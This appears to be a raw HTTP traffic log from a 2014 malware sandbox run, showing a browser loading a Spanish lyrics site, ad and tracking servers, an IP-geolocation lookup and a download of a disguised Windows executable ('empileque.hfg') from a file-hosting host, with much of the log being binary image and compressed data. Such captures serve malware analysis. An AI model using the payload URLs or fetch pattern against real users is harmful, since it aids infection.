Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: u.pub-fit.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Last-Modified: Tue, 18 Feb 2014 15:25:43 GMT
ETag: f0908d483f8ef53a51e6767d7fecbe97
X-Trans-Id: tx820f0b51640349af9f524-0053440ed2dfw1
Accept-Ranges: bytes
X-Timestamp: 1392737142.11331
Content-Type: text/html
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 382
Cache-Control: public, max-age=673
Expires: Mon, 21 Apr 2014 12:08:41 GMT
Date: Mon, 21 Apr 2014 11:57:28 GMT
Connection: keep-alive
..........m.Qo. ..........M...N..j.C.*.....(\l*...W{...p..a........\.`...'.G.ql..:.jc.s?d.2.`<..}:A..x.?.[6[.{..8Kjf.k...%....}.el.....%9...V&.5g...N....k..S..A.............?...P...........%..F.....t{}Kn../.o...6U. .EQH..(...r].q-..Q....F..*.'T.<...Ga...._>.......z....7..:.. |.t.7x.z3@ j._....,$...F.i.....S....7...&.;...!...n...-....:E.D..qa..eF^......L.`..IDY.9..M....4...n......HTTP/1.1 200 OK..Last-Modified: Tue, 18 Feb 2014 15:25:43 GMT..ETag: f0908d483f8ef53a51e6767d7fecbe97..X-Trans-Id: tx820f0b51640349af9f524-0053440ed2dfw1..Accept-Ranges: bytes..X-Timestamp: 1392737142.11331..Content-Type: text/html..Vary: Accept-Encoding..Content-Encoding: gzip..Content-Length: 382..Cache-Control: public, max-age=673..Expires: Mon, 21 Apr 2014 12:08:41 GMT..Date: Mon, 21 Apr 2014 11:57:28 GMT..Connection: keep-alive............m.Qo. ..........M...N..j.C.*.....(\l*...W{...p..a........\.`...'.G.ql..:.jc.s?d.2.`<..}:A..x.?.[6[.{..8Kjf.k...%....}.el.....%9...V&.5g...N....k..S..A.............?...P...........%..F.....t{}Kn../.o...6U. .EQH..(...r].q-..Q....F..*.'T.<...Ga...._>.......z....7..:.. |.t.7x.z3@ j._....,$...F.i.....S....7...&.;...!...n...-....:E.D..qa..eF^......L.`..IDY.9..M....4...n........
<<
<<< skipped >>>
GET / HTTP/1.1
User-Agent: Mozilla/4.0
Host: api.wipmania.com
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 21 Apr 2014 11:57:00 GMT
Content-Type: text/html
Content-Length: 21
Connection: keep-alive
Keep-Alive: timeout=20
193.138.244.231<br>UAHTTP/1.1 200 OK..Server: nginx..Date: Mon, 21 Apr 2014 11:57:00 GMT..Content-Type: text/html..Content-Length: 21..Connection: keep-alive..Keep-Alive: timeout=20..193.138.244.231<br>UA..
GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: mi.2papa.us
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:26 GMT
Content-Type: text/html
Content-Length: 2723
Last-Modified: Thu, 03 Apr 2014 17:51:39 GMT
Connection: keep-alive
ETag: "533d9fab-aa3"
Accept-Ranges: bytes
<script>.var dominios=[..'/Letra/A/',..'/Letra/B/',..'/Letra/C/',..'/Letra/D/',..'/Letra/E/',..'/Letra/F/',..'/Letra/G/',..'/Letra/H/',..'/Letra/I/',..'/Letra/J/',..'/Letra/K/',..'/Letra/L/',..'/Letra/M/',..'/Letra/N/',..'/Letra/O/',..'/Letra/P/',..'/Letra/Q/',..'/Letra/R/',..'/Letra/S/',..'/Letra/T/',..'/Letra/U/',..'/Letra/V/',..'/Letra/W/',..'/Letra/X/',..'/Letra/Y/',..'/Letra/Z/',....'/Alternativos/',..'/Anime/',..'/Arabe/',..'/Bachatas/',..'/Baladas-de-Oro/',..'/Baladas-Ingles/',..'/Barras/',..'/Billboards/',..'/Boleros/',..'/Brasilenas/',..'/Chicha/',..'/Chistes/',....'/Cristianas/',..'/Cumbia/',..'/Cumbia-Boliviana/',..'/Cumbia-Chilena/',..'/Cumbia-Colombiana/',..'/Cumbia-Ecuatoriana/',..'/Cumbia-Mexicana/',..'/Cumbia-Surena/',..'/Dance/',..'/De-Peliculas/',....'/Discos/',..'/Electronica/',..'/Emo-Punk/',..'/Emo-Screamo/',..'/Flamenco/',..'/Folk/',..'/Gothic/',..'/Hindu/',..'/Hip-Hop/',..'/Huayno/',..'/Infantiles/',....'/Instrumentales/',..'/Japonesas/',..'/Jazz/',..'/Karaoke/',..'/Koreanas/',..'/Latin/',..'/Latinoamericanas/',..'/Merengue/',..'/Metal/',..'/Musica-Clasica/',..'/Musica-Criolla/',....'/Poemas/',..'/Pop-Rock/',..'/Punk/',..'/Rancheras/',..'/Reggae/',..'/Reggaeton/',..'/Ringtones/',..'/Rock-70-80-90/',..'/Rock-Latino/',..'/Romanticas/',..'/Salsa/',....'/Seccion-Djs/',..'/SoundTracks/',..'/Takirari/',..'/Tangos/',..'/Teckno/',..'/Texmex/',..'/Trance/',..'/Trova/',..'/Vallenatos/',..'/Villancicos/',..'/Villeras/',..'/Visual-Kei/',....'/villeras/la-cadiz/',..'/chicha/roy-y-los-gentiles/',
<<
<<< skipped >>>
GET /2454.html?s=300x250 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: u.pub-fit.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Last-Modified: Tue, 18 Feb 2014 15:25:43 GMT
ETag: f0908d483f8ef53a51e6767d7fecbe97
X-Trans-Id: tx820f0b51640349af9f524-0053440ed2dfw1
Accept-Ranges: bytes
X-Timestamp: 1392737142.11331
Content-Type: text/html
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 382
Cache-Control: public, max-age=673
Expires: Mon, 21 Apr 2014 12:08:41 GMT
Date: Mon, 21 Apr 2014 11:57:28 GMT
Connection: keep-alive
..........m.Qo. ..........M...N..j.C.*.....(\l*...W{...p..a........\.`...'.G.ql..:.jc.s?d.2.`<..}:A..x.?.[6[.{..8Kjf.k...%....}.el.....%9...V&.5g...N....k..S..A.............?...P...........%..F.....t{}Kn../.o...6U. .EQH..(...r].q-..Q....F..*.'T.<...Ga...._>.......z....7..:.. |.t.7x.z3@ j._....,$...F.i.....S....7...&.;...!...n...-....:E.D..qa..eF^......L.`..IDY.9..M....4...n......HTTP/1.1 200 OK..Last-Modified: Tue, 18 Feb 2014 15:25:43 GMT..ETag: f0908d483f8ef53a51e6767d7fecbe97..X-Trans-Id: tx820f0b51640349af9f524-0053440ed2dfw1..Accept-Ranges: bytes..X-Timestamp: 1392737142.11331..Content-Type: text/html..Vary: Accept-Encoding..Content-Encoding: gzip..Content-Length: 382..Cache-Control: public, max-age=673..Expires: Mon, 21 Apr 2014 12:08:41 GMT..Date: Mon, 21 Apr 2014 11:57:28 GMT..Connection: keep-alive............m.Qo. ..........M...N..j.C.*.....(\l*...W{...p..a........\.`...'.G.ql..:.jc.s?d.2.`<..}:A..x.?.[6[.{..8Kjf.k...%....}.el.....%9...V&.5g...N....k..S..A.............?...P...........%..F.....t{}Kn../.o...6U. .EQH..(...r].q-..Q....F..*.'T.<...Ga...._>.......z....7..:.. |.t.7x.z3@ j._....,$...F.i.....S....7...&.;...!...n...-....:E.D..qa..eF^......L.`..IDY.9..M....4...n........
<<
<<< skipped >>>
GET /wj53lrzxv7lg/bg4jdeppib94ych/empileque.hfg HTTP/1.1
User-Agent: Mozilla/4.0
Host: download627.mediafire.com
Connection: Keep-Alive
Cookie: ukey=d744vnx8vv7np87ybpq2qnf92ov8hquc
HTTP/1.1 200 OK
Server: LRBD-bigdownload-
Date: Mon, 21 Apr 2014 11:57:18 GMT
Connection: close
Accept-Ranges: bytes
Content-transfer-encoding: binary
Content-Length: 160368
Content-Disposition: attachment; filename="empileque.hfg"
Content-Type: application/x-dosexec
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......].......................p...............rich............................PE..L...h........................ ....................@..................................U..........................................$........................4...$...$...................$...............................................................text............................... ..`.data....!..........................@....rsrc.p."...........................@..@l.[J.............SVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
<<
<<< skipped >>>
GET /small/05/567.png HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: widgets.amung.us
HTTP/1.1 200 OK
Server: nginx/1.2.4
Date: Mon, 21 Apr 2014 11:57:47 GMT
Content-Type: image/png
Content-Length: 324
Last-Modified: Sun, 13 Jun 2010 09:48:29 GMT
Connection: keep-alive
Expires: Wed, 21 May 2014 11:57:47 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
.PNG........IHDR...P.........D......9PLTE.bM.nX.82.G:................zc.....z.UC..n.'-00/...555...........IDAT8...Y.. .D.....p..v..P5...X1V>.....Y.J.<M....Gb...]..G....v.LL..1;?..D........_.>....[.V..R... .G`....E....0..... ...LG.%...k.Q..C..X..*F2.......Y...3....a.e.D..-.Q.R.W......a...;..-..
GET /Imagenes/i.f06.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:29 GMT
Content-Type: image/gif
Content-Length: 277
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-115"
Accept-Ranges: bytes
GIF89a.......................................................................................................!.......,...........`. .e.h..l..p,.....3T|....pH,...$r..Dv..tJ.Zy.....z..I.L.....y.n....|.....|T....C.}......~...s...k...`...W...R...G....I....E....A................!.;....
GET /Imagenes/i_15.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:29 GMT
Content-Type: image/gif
Content-Length: 156
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-9c"
Accept-Ranges: bytes
GIF89a.......................................................................................................!.......,........... $(A...C@..6....0KHr..-=!.;....
GET /Imagenes/i_58.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:30 GMT
Content-Type: image/gif
Content-Length: 228
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-e4"
Accept-Ranges: bytes
GIF89a.......................................................................................................!.......,..........a`.a$....J....$OE]dx.qVo.@.b.8...d...\...t..F.X.c..x .p#@.?...z.h;..8aN.....>....................!.;....
GET /Imagenes/lyrics_ico.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:30 GMT
Content-Type: image/gif
Content-Length: 1436
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-59c"
Accept-Ranges: bytes
GIF89aB.........hgg|{{......rqq.................................................................~...MLM...........................211....................................<;?...............jlj...........................oqodfk~~}...FFF............^^`..................::@777...... **......|}|.........ijl...887~~....QRQ||.wwwrrr...888........................GFKXZ[....................................>>>...EEE~}..........776.........)))......`af......///.........=>=.....................{{{......UVUfcg121...:::......qqr........................................................................................................................................................................................................................................................................!.......,....B.......k..Hp.....*\..a...lI.H.....3f.. ......Pp.d..W..4.....0c.T.b...)P......F?........H.*-..E.Z#0(.E.*-6.d..4....`....U....8.Z..U F.L..b.-.......B...z98X...... ...D.$M...A.......kXaK.....(...O...% .P.3....x. AU...*........SI.@.8.%&.`9qb...o..'..@.1...1. ........A ......0..=q....Ou...@....Q.......J.!X.@.....x..gAl!.0....'. .f.."fd..)U..I....!....@..x.J..2.../2...4...D...#*.|..!.....s..#*,4.#........(.....F!.d..*.|...cJ...h.i..:.Q. g..../4p&........)..{..@..H...."j.........AG..P....:.A..v....&0@.0.b...R....h.....yR@...j........0......I.4.q..r.q...6....F...8.0@.%..m Yl.....................J...@.D.8@.@.Lp...N.....,pA.80.F.'....7.......;....
<<
<<< skipped >>>
GET /Imagenes/videos_ico.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:30 GMT
Content-Type: image/gif
Content-Length: 1522
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-5f2"
Accept-Ranges: bytes
GIF89aB.....................|{{.....................rqq???...............888.........|{z.....................666yxx............, ............OOO...BBB@@@```..............................`aa...988.........,,,...:::-,,;::100000FFE...999///...655*))...yyx.........||{MNM``_kkk...pqp.....................XZY...544...xww...VWVZ\Z.........OQP\\[...=<<......pppacbUVUUUU...wwv...ccbZZZWWW...IIIYZY433...............tvt............]^]ikj566VUU......KKK...||z.........uut............qrq...]]\......$$$VVVglieed...npn......}}}ded...PPO{zzFFF............jjj[[[...WXWVVUccc......;<<......bcb...|}|...}|{ege...---...`a`MMM......RRR.........==<...gggaaa...utt555RTR~}|...yyyabb...hgg...............................................................................................................!.......,....B..........H......*\8p...."J.H.....1F... ...*..I....(S.TYA....w..0)...8o....\.?....J........1.....z.*.,..8V*92uJG,hF.H.F....h..=[....6.y ..U.#...q....Kg@P.5B..... ^.....,.m.....X........9..L{!A.i...........O..@....thUI.f..>.V.h.@.!Y.l _.|.,...K....u5.4.b...."~x8.`E.. D9. @`......L.V...c..M@B.A~.a .@~.Yg........,....(........-P`..."....40.|...... ..... ...<.......6,r.#u......`..2...I.m....B..#.Nh........U.`.............40..O..@D.....r.S.6&.1..[$.d n.i.....M.1`.'..0.'...Y.6.d.@.1.iiD.d.).....3u.../I8....f..}...A..x.Af..4..."0p.67.`.....@...j,9., ...@..'w....8Pr.. .Q...v....b....h.......6.t @......_..-....A.....'.<2E5....#J,....7....G.o.Zd..7..3N#AH...d...!.dl..(..........D..84.l..8....<....?Ht..$0d..H.p...5.
<<
<<< skipped >>>
GET /Imagenes/twitter.png HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:30 GMT
Content-Type: image/png
Content-Length: 608
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-260"
Accept-Ranges: bytes
.PNG........IHDR................a....sBIT....|.d.....pHYs...........~.....tEXtCreation Time.6/24/09..k.....tEXtSoftware.Adobe Fireworks CS4........IDAT8...Kk.A....]:;n4...6!.z.%...O.............`.$.. .@B.b|..2.>`......2..6b..n..~..j:x../Y.u.,... ..*hPj....l......X..H..V.mP.R.Za?IN#......).......o.c.y.G...x.z".(7..@..XJo...L......(7..a...d......e..dX.N.U*....k......7n9..eV`.$...Tk7<...]<|R.fV.*p.\....../w...........c ..d.>.ia..!./O..M..`.....:.!............|.........{.....?.....C..oc.......{.c<"..................`....I..2....v..k.LD.m.17...Z.:P..K....:..a7.i...P.t....J.....sUC......7*.a8.;^....IEND.B`.....
GET /Imagenes/facebook.png HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:30 GMT
Content-Type: image/png
Content-Length: 502
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-1f6"
Accept-Ranges: bytes
.PNG........IHDR................a....sBIT....|.d.....pHYs...........~.....tEXtCreation Time.6/24/09..k.....tEXtSoftware.Adobe Fireworks CS4.......OIDAT8....J.A..............k...)..S..&E,.G.7...A.l..Z..W.1.....a...c...Av7....;.33..rS.f..X6&......5.....v...R*.l....c.....P.JO....$.r.....5........<..../... ah&..$...m......g...&.&...X.....p.X...$........h2...n.#.;...`......u._.W....p..3..W.I.ur..x.:...0.4.%>.(..D.$...|*..=...-,.....N'..^0<.=...KLPk......<.7....5..s^..<.cm.v....Z:...............IEND.B`.....
GET /Imagenes/i_02.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:31 GMT
Content-Type: image/gif
Content-Length: 7141
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-1be5"
Accept-Ranges: bytes
GIF89a..B...............................e..b...........m........r.....x........w..o.....y....#..(~.&..1..7..8..?..C..Y..b..e..|....................................|..x..h..}..j..m.....q.......*..'..0..-{.)..@..I..M..R..F..K..V..U..R..Y..M..\..T..\..b..h..b..X..j..a..i..q..p..y..v.....v..|............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!.......,......B........H......*\......#J..P....3j...... C..I.......\.....0c..I....8s.......@........H.*].....P.J.J....N.i......`...K....h..] ....p...K....x........v...L...... ^......#K.......3k.......C..M.......^......c..M.....s.................. _.......K.N......i...........O......._/~.......O......7k&L..f..(.............6.`........c....g.0.J8a-.Z.....h..&.... ..b.,..".1.8..8.x.7..2.'..".76.h..H"..0=...'P.9d.IV.c;Xf..5..........E..%.%Z.e;].I.;\.)..rZs.-.t.....B.7..)....*.;<..I'..b..}..........fjM5<...'..9..b..M5.d.....YM5...*........(.C'..:.... .....k..D..........jk'..bm..D.f/.v.I/......B.....j...(.k'.|.k...[.'.....J...... .4..L.5.."K#.....J. 1.Q..I#.k...Zh../.\sp....q#.............K#.^../,....<...-......*`s.9....-...(..aC.TWM..S...&a
<<
<<< skipped >>>
GET /Imagenes/i_08.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:31 GMT
Content-Type: image/gif
Content-Length: 70
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-46"
Accept-Ranges: bytes
GIF89a...............................!.......,............J,..H9j.%..;....
GET /Imagenes/-4524f.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:31 GMT
Content-Type: image/gif
Content-Length: 110
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-6e"
Accept-Ranges: bytes
GIF89a.............222.........@@@===........................!.......,...........0.... ....`(.di...q.g`...K..;....
GET /Imagenes/ii_14.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:31 GMT
Content-Type: image/gif
Content-Length: 176
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-b0"
Accept-Ranges: bytes
GIF89a..0..........'''RRRQQQ///ZZZ..................%%%...000.........___....................................!.......,......0...- ....Q(.().8-5.Bl.x..|....pH,..1B..h%.........;....
GET /Imagenes/vineta.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:31 GMT
Content-Type: image/gif
Content-Length: 87
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-57"
Accept-Ranges: bytes
GIF89a...............................!.......,...........8...P.1..T...f.75.E9..B...S..;....
GET /Imagenes/fondo_icos.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:31 GMT
Content-Type: image/gif
Content-Length: 153
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-99"
Accept-Ranges: bytes
GIF89a.......................................................................................................!.......,...........`$.d9.@P...<Os,..@..C!.;....
GET /static.img/img/i-21.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:32 GMT
Content-Type: image/gif
Content-Length: 63
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-3f"
Accept-Ranges: bytes
GIF89a...............................!.......,...........h2E..;....
GET /Imagenes/i_82.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:32 GMT
Content-Type: image/gif
Content-Length: 354
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-162"
Accept-Ranges: bytes
GIF89a.......................................................................................................................................................................................................!.......,...........@.i8..MFb.xD6..#t..J..OS{.f.MHi<............(....w;^....}. ................$...$...................................&.....C....A.;....
GET /Imagenes/i_86.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:32 GMT
Content-Type: image/gif
Content-Length: 355
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-163"
Accept-Ranges: bytes
GIF89a.......................................................................................................................................................................................................!.......,.............PX.....Q9d..Hg2J.Z..!..5v.\.X...Ef..,"...7)....w;~$...}.!"....... ... ... ...%...%.....................................'....BA.;....
GET / HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
Cookie: __utma=127640345.1684967166.1398081329.1398081329.1398081329.1; __utmb=127640345.1.10.1398081329; __utmc=127640345; __utmz=127640345.1398081329.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:43 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 130866
Last-Modified: Mon, 07 Apr 2014 17:00:48 GMT
Connection: keep-alive
ETag: "5342d9c0-1ff32"
Accept-Ranges: bytes
.<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">. <head>. <title>Musica Online</title>. <meta name='title' content="Musica Online">. <meta name='description' content="Musica Online tiene un gran repertorio de musica en linea, disfruta de la canciones que mas suenan en la disco, mira los videos y letras de tus canciones favoritas">. <meta name='keywords' content="MUSICA ONLINE,ESCUCHAR MUSICA, MUSICA EN LINEA">. <meta name="robots" content="index, follow"/>. <meta name="author" content="Musica Online"/>. <meta name="copyright" content="Musica Online 2012 Derechos Reservados"/>. <meta http-equiv="Content-Language" content="es"/>. <meta name="revisit" content="1 days"/>. <meta NAME="googlebot" content="index, follow" />. <base href="hXXp://esmusicon.com/" />. <META HTTP-EQUIV="Content-Type" content="text/html; charset=utf-8" />. <link href="./Estilos/CSS.Sitio.css" rel="stylesheet" type="text/css" />. <link href="./Estilos/CSS.Panel.css" rel="stylesheet" type="text/css" />. <script type="text/javascript" src="Js/Principal.js"></script&g
<<
<<< skipped >>>
GET /pixel.gif?id=5397210&r=0.8804630965534756&u=http://esmusicon.com/Poemas/ HTTP/1.1
Accept: */*
Referer: hXXp://u.pub-fit.com/2454.html?s=300x250
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: px.pub-fit.com
